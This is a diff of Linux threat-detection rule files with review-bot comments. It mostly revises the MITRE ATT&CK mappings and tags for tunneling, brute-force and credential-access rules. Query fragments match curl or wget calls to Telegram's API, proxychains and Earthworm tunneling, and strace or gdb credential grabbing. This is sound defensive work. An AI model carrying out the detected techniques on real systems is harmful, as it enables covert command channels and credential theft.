@@ -124,31 +134,14 @@ process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" reference = "https://attack.mitre.org/techniques/T1572/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml b/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml index ccb257c05e8..6af65daf2cc 100644 --- a/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml +++ b/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [transform] [[transform.osquery]] @@ -170,9 +170,9 @@ process.name == "proxychains" and process.args : ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" +id = "T1572" +name = "Protocol Tunneling" +reference = "https://attack.mitre.org/techniques/T1572/" [rule.threat.tactic] id = "TA0011" diff --git a/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml b/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml index 5bc19c76442..a32949a8673 100644 
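Review bot: Removing the `T1021.004` (SSH) Lateral Movement entry drops the one technique that describes the actual invocation — an `ssh` session to another host with X11 forwarding enabled rides on an SSH remote service, so both `T1572` and `T1021.004` were accurate. Unless the intent is to stop counting outbound SSH as lateral movement across the corpus, keep the entry and its `"Tactic: Lateral Movement"` tag. The tag and threat removals are consistent with each other, so no tag gap is introduced by this hunk.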
--- a/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml +++ b/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [transform] [[transform.osquery]] @@ -193,11 +193,6 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" - [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml b/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml index 31058ef855f..971d4da2b10 100644 --- a/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml +++ b/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] @@ -118,11 +118,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" - [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_potential_tunneling_command_line.toml b/rules/linux/command_and_control_potential_tunneling_command_line.toml index 4bba96a97cd..f0209e6a64a 100644 --- a/rules/linux/command_and_control_potential_tunneling_command_line.toml +++ b/rules/linux/command_and_control_potential_tunneling_command_line.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/12/12" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/12" [transform] [[transform.osquery]] @@ -170,11 +170,6 @@ process.command_line regex """.*[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[ [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" - [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_telegram_api_request.toml b/rules/linux/command_and_control_telegram_api_request.toml index 43f28f4633f..7c6867e61ea 100644 --- a/rules/linux/command_and_control_telegram_api_request.toml +++ b/rules/linux/command_and_control_telegram_api_request.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -120,12 +120,17 @@ process.name in ("curl", "wget") and process.command_line like "*api.telegram.or [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1102" -name = "Web Service" -reference = "https://attack.mitre.org/techniques/T1102/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique]] + name = "Application Layer Protocol" + id = "T1071" + reference = "https://attack.mitre.org/techniques/T1071/" + + [[rule.threat.technique.subtechnique]] + name = "Web Protocols" + id = "T1071.001" + reference = "https://attack.mitre.org/techniques/T1071/001/" 
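Review bot: The added `[rule.threat.tactic]`, `[[rule.threat.technique]]` and `[[rule.threat.technique.subtechnique]]` tables in the Telegram rule hunk are written indented and with `name` before `id`, while the old side of the same hunk and every other rule file in this diff use unindented tables in `id`, `name`, `reference` order; the repository's rule formatter is likely to rewrite this on the next touch and produce noise. Separately, dropping `T1102 Web Service` loses the technique that most directly describes command and control over a public web API, and `T1071.001 Web Protocols` is only a partial substitute, so if both apply they should both be listed. A minimal fix is to write the new technique as `[[rule.threat.technique]]` / `id = "T1071"` / `name = "Application Layer Protocol"` unindented, matching the rest of the file.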
diff --git a/rules/linux/command_and_control_tunneling_via_earthworm.toml b/rules/linux/command_and_control_tunneling_via_earthworm.toml index 426efda183d..be519817da2 100644 --- a/rules/linux/command_and_control_tunneling_via_earthworm.toml +++ b/rules/linux/command_and_control_tunneling_via_earthworm.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/12" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [transform] [[transform.osquery]] @@ -177,11 +177,6 @@ process.args : "-s" and process.args : "-d" and process.args : "rssocks" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" - [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/credential_access_collection_sensitive_files.toml b/rules/linux/credential_access_collection_sensitive_files.toml index 2bd89455114..71d52ec71c9 100644 --- a/rules/linux/credential_access_collection_sensitive_files.toml +++ b/rules/linux/credential_access_collection_sensitive_files.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/22" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/02" [rule] author = ["Elastic"] 
@@ -153,6 +153,24 @@ Compression utilities like zip, tar, and gzip are essential for efficiently mana [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" @@ -168,23 +186,6 @@ id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.command_line", "process.parent.executable"] diff --git a/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml b/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml index 32c71e4856a..417321d89b0 100644 --- a/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml +++ b/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] 
@@ -101,24 +101,6 @@ Containers are lightweight, portable environments used to run applications consi [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1560" -name = "Archive Collected Data" -reference = "https://attack.mitre.org/techniques/T1560/" - -[[rule.threat.technique.subtechnique]] -id = "T1560.001" -name = "Archive via Utility" -reference = "https://attack.mitre.org/techniques/T1560/001/" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" @@ -133,3 +115,21 @@ reference = "https://attack.mitre.org/techniques/T1552/001/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1560" +name = "Archive Collected Data" +reference = "https://attack.mitre.org/techniques/T1560/" + +[[rule.threat.technique.subtechnique]] +id = "T1560.001" +name = "Archive via Utility" +reference = "https://attack.mitre.org/techniques/T1560/001/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/linux/credential_access_gdb_init_process_hooking.toml b/rules/linux/credential_access_gdb_init_process_hooking.toml index ef6dd41d452..646c05881fc 100644 --- a/rules/linux/credential_access_gdb_init_process_hooking.toml +++ b/rules/linux/credential_access_gdb_init_process_hooking.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] 
@@ -113,6 +113,11 @@ id = "T1003"
 name = "OS Credential Dumping"
 reference = "https://attack.mitre.org/techniques/T1003/"
+[[rule.threat.technique.subtechnique]]
+id = "T1003.007"
+name = "Proc Filesystem"
+reference = "https://attack.mitre.org/techniques/T1003/007/"
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
diff --git a/rules/linux/credential_access_gdb_process_hooking.toml b/rules/linux/credential_access_gdb_process_hooking.toml
index de89947a394..af461be6f71 100644
--- a/rules/linux/credential_access_gdb_process_hooking.toml
+++ b/rules/linux/credential_access_gdb_process_hooking.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/30"
 integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -62,7 +62,18 @@ references = ["https://github.com/controlplaneio/truffleproc", "https://github.c
 risk_score = 21
 rule_id = "66c058f3-99f4-4d18-952b-43348f2577a0"
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Credential Access",
+ "Data Source: Elastic Defend",
+ "Data Source: Elastic Endgame",
+ "Data Source: Auditd Manager",
+ "Data Source: Crowdstrike",
+ "Data Source: SentinelOne",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -76,26 +87,19 @@ process.args != "1"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1005"
-name = "Data from Local System"
-reference = "https://attack.mitre.org/techniques/T1005/"
-
-[rule.threat.tactic]
-id = "TA0009"
-name = "Collection"
-reference = "https://attack.mitre.org/tactics/TA0009/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1003"
 name = "OS Credential Dumping"
 reference = "https://attack.mitre.org/techniques/T1003/"
+[[rule.threat.technique.subtechnique]]
+id = "T1003.007"
+name = "Proc Filesystem"
+reference = "https://attack.mitre.org/techniques/T1003/007/"
+
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
diff --git a/rules/linux/credential_access_gh_auth_via_nodejs.toml b/rules/linux/credential_access_gh_auth_via_nodejs.toml
index ad32bc2cae0..1ab982a0861 100644
--- a/rules/linux/credential_access_gh_auth_via_nodejs.toml
+++ b/rules/linux/credential_access_gh_auth_via_nodejs.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/09/18"
 integration = ["endpoint", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/17"
 [rule]
 author = ["Elastic"]
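Review bot: Two consecutive added blank lines between the `T1003.007` subtechnique block and `[rule.threat.tactic]`, plus a trailing added blank line after the final `reference`, leave the gdb process-hooking rule with double spacing and a blank last line that the other TOML files in this diff do not have. One of the two `+` blank lines and the trailing one should be dropped so the section reads `reference = "https://attack.mitre.org/techniques/T1003/007/"`, one blank line, `[rule.threat.tactic]`. The removal of the Collection entry does match the `"Tactic: Collection"` tag removal in the previous hunk, so tags and mapping stay consistent.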
@@ -48,7 +48,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -59,6 +69,11 @@ process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" @@ -68,3 +83,16 @@ reference = "https://attack.mitre.org/techniques/T1528/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/linux/credential_access_kubernetes_service_account_secret_access.toml b/rules/linux/credential_access_kubernetes_service_account_secret_access.toml index d3e1807cea8..b4054ccf7f8 100644 --- a/rules/linux/credential_access_kubernetes_service_account_secret_access.toml 
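Review bot: Adding `T1613 Container and Resource Discovery` and a `"Tactic: Discovery"` tag to a rule about `gh auth` invoked from Node.js looks like a copy of the Kubernetes service-account rule's mapping later in this diff rather than something this rule's subject supports; nothing visible in the hunk relates to containers. If the discovery angle is that the command enumerates repositories or tokens, a Discovery technique that matches the query should be chosen; otherwise the second `[[rule.threat]]` entry for `TA0007` and the tag should be removed together. The query lines this hunk header refers to are outside the hunk.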
+++ b/rules/linux/credential_access_kubernetes_service_account_secret_access.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/17" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -82,7 +82,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Domain: Container", + "Domain: Kubernetes", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -124,22 +134,30 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" - [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/linux/credential_access_manual_memory_dumping.toml b/rules/linux/credential_access_manual_memory_dumping.toml index 1d2376ab2fb..d6f5ffe2135 100644 --- a/rules/linux/credential_access_manual_memory_dumping.toml +++ b/rules/linux/credential_access_manual_memory_dumping.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -120,6 +120,11 @@ id = "T1003.007" name = "Proc Filesystem" reference = "https://attack.mitre.org/techniques/T1003/007/" +[[rule.threat.technique]] +id = "T1212" +name = "Exploitation for Credential Access" +reference = "https://attack.mitre.org/techniques/T1212/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" 
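Review bot: `T1212 Exploitation for Credential Access`, added after the `T1003.007 Proc Filesystem` subtechnique in the manual memory-dumping rule, describes exploiting a software vulnerability to obtain credentials, whereas reading process memory through `/proc` uses intended kernel functionality; the same addition appears in `credential_access_proc_credential_dumping.toml` further down. Unless the query, which is outside this hunk, covers an actual exploit path, the block `[[rule.threat.technique]]` / `id = "T1212"` / `name = "Exploitation for Credential Access"` should be dropped from both rules.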
diff --git a/rules/linux/credential_access_potential_linux_ssh_bruteforce_external.toml b/rules/linux/credential_access_potential_linux_ssh_bruteforce_external.toml index fc9c5844bef..3cfe8812e89 100644 --- a/rules/linux/credential_access_potential_linux_ssh_bruteforce_external.toml +++ b/rules/linux/credential_access_potential_linux_ssh_bruteforce_external.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/14" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -110,6 +110,11 @@ id = "T1110.001" name = "Password Guessing" reference = "https://attack.mitre.org/techniques/T1110/001/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" diff --git a/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml b/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml index ef52de06f44..020628dd4f9 100644 --- a/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml +++ b/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/21" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -106,6 +106,11 @@ id = "T1110.001" name = "Password Guessing" reference = "https://attack.mitre.org/techniques/T1110/001/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" diff --git a/rules/linux/credential_access_potential_password_spraying_attack.toml b/rules/linux/credential_access_potential_password_spraying_attack.toml index d29948322d0..711c7bd6fae 100644 
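Review bot: Adding `T1110.003 Password Spraying` to the external and internal SSH brute-force rules here, and to the successful-brute-force rule in the next chunk, while the dedicated spraying rule gains `T1110.001 Password Guessing`, erases the distinction between the two subtechniques these rules were split to express. If the brute-force rules cannot tell one-user-many-passwords from one-password-many-users, mapping them to the parent `T1110 Brute Force` alone is more accurate than listing both subtechniques on every rule. Which pattern each rule's threshold actually detects is defined in the query, which is outside these hunks.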
--- a/rules/linux/credential_access_potential_password_spraying_attack.toml +++ b/rules/linux/credential_access_potential_password_spraying_attack.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/24" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/12" [rule] author = ["Elastic"] @@ -111,6 +111,11 @@ id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" + [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" diff --git a/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml b/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml index f8019adac53..8f8c9f7c185 100644 --- a/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml +++ b/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/14" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -108,6 +108,11 @@ id = "T1110.001" name = "Password Guessing" reference = "https://attack.mitre.org/techniques/T1110/001/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" diff --git a/rules/linux/credential_access_proc_credential_dumping.toml b/rules/linux/credential_access_proc_credential_dumping.toml index f98a1a25d33..f543e3ff547 100644 --- a/rules/linux/credential_access_proc_credential_dumping.toml +++ b/rules/linux/credential_access_proc_credential_dumping.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/04/26" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -122,6 +122,11 @@ id = "T1003.007" name = "Proc Filesystem" reference = "https://attack.mitre.org/techniques/T1003/007/" +[[rule.threat.technique]] +id = "T1212" +name = "Exploitation for Credential Access" +reference = "https://attack.mitre.org/techniques/T1212/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" diff --git a/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml b/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml index 0085884fa66..0b636c1f0b6 100644 --- a/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml +++ b/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -46,7 +46,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -110,16 +117,3 @@ reference = "https://attack.mitre.org/techniques/T1552/001/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml b/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml index d214945e6b9..feb93587467 100644 --- a/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml +++ b/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/10" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/24" [rule] author = ["Elastic"] @@ -56,7 +56,15 @@ references = [ risk_score = 47 rule_id = "9eaa3fb1-3f70-48ed-bb0e-d7ae4d3c8f28" severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
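Review bot: Removing the Discovery entry (`T1083 File and Directory Discovery` under `TA0007`) together with the `"Tactic: Discovery"` tag from the in-container credential search rule drops the technique that most directly describes searching a filesystem for key and password files, leaving only Credential Access. If the query, outside this hunk, still detects filesystem searches, the `[[rule.threat]]` block for `TA0007` should stay; if the rule has been narrowed to credential file access only, the change is at least consistent between tags and mapping.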
@@ -69,11 +77,24 @@ sequence by host.id with maxspan=3s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1056" -name = "Input Capture" -reference = "https://attack.mitre.org/techniques/T1056/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1554" +name = "Compromise Host Software Binary" +reference = "https://attack.mitre.org/techniques/T1554/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/defense_evasion_apparmor_policy_violation.toml b/rules/linux/defense_evasion_apparmor_policy_violation.toml index ba81a129497..0bdc8dd8329 100644 --- a/rules/linux/defense_evasion_apparmor_policy_violation.toml +++ b/rules/linux/defense_evasion_apparmor_policy_violation.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/20" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/20" [rule] author = ["Elastic"] @@ -96,6 +96,11 @@ id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml b/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml index 729612e6179..6b076f4a605 100644 --- a/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml +++ b/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml 
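Review bot: Replacing `T1056 Input Capture` with `T1556 Modify Authentication Process`, and adding a Persistence entry with `T1554 Compromise Host Software Binary`, misdescribes what an `strace` attach to the SSH daemon does: it observes the authentication exchange without modifying PAM, sshd configuration, or any binary on disk, so the original `id = "T1056"` / `name = "Input Capture"` lines were the accurate mapping and nothing in this hunk supports a persistence claim. If a variant that patches sshd is meant, it belongs in a separate rule with its own query. The new `"Tactic: Persistence"` tag is also placed before `"Tactic: Credential Access"` while the threat entries are in the opposite order.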
@@ -2,7 +2,7 @@
 creation_date = "2024/08/28"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
